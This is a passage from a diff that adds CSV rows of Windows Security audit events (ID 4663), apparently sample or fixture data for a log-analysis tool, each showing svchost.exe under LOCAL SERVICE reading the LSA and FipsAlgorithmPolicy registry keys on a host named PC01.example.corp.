+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452864</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452863</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452862</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452861</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452860</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452859</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452858</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452857</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452856</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452855</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452854</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452853</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452852</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452851</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452850</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452849</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
